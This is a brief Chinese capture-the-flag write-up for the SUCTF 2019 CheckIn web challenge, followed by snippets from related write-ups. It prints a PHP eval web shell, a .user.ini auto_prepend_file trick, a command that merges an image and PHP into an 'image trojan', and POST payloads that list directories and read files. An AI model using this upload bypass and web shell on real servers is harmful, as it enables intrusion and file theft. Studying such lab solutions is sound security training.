解题

GIF89a                  
auto_prepend_file=l3ef.jpg

<script language="php">eval($_POST['l3ef']);phpinfo();</script>

制作图片马

copy background.jpg/a + l3ef.php/b l3ef.jpg

l3ef=var_dump(scandir("/"));

image.png

读取文件

l3ef=var_dump(file_get_contents("/flag"));

image.png

SUCTF 2019-WEB-CheckIn
复现地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 考察...
[SUCTF] SUCTF web题目 writeup
SUCTF 这周末打了suctf，协会的大佬们都去参加tctf了，都没人打pwn了，不过最终成绩还可以不过恭喜协会...
python urllib.parse.urlunsplit()
题目地址 https://buuoj.cn/challenges#[SUCTF%202019]Pythonginx...
SUCTF 2019-WEB-EasySQL
复现地址https://buuoj.cn/challenges#[SUCTF%202019]EasySQL 考察点...
buuoj部分wp
Web 1.[SUCTF]EasySQL 预期解后台的查询语句可能为select $_POST['a'] || ...
SUCTF 2019 PWN
0x01 sudrv qemu: 开启了kalsr和smep保护init: 内核会加载驱动sudrv.ko，且pr...
[SUCTF 2019]CheckIn
先讲操作首先，构造一个.user.ini文件，内容如下：然后构造一个a.jpg，内容如下：然后将两个文件分别...
SUCTF 2019 WriteUp
Web Misc 签到题给了一串编码，制作：打开网页就可以得到flag。 game 查看源代码得到：在/js...
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn 首页是个上传页面，尝试上传一个shell，发现回显非法后缀。删除后缀再上传...
SUCTF复盘
当时没好好打，现在把环境复现一下对着wp撸一发。 WEB annonymous 这题原思路是HITCON2017的...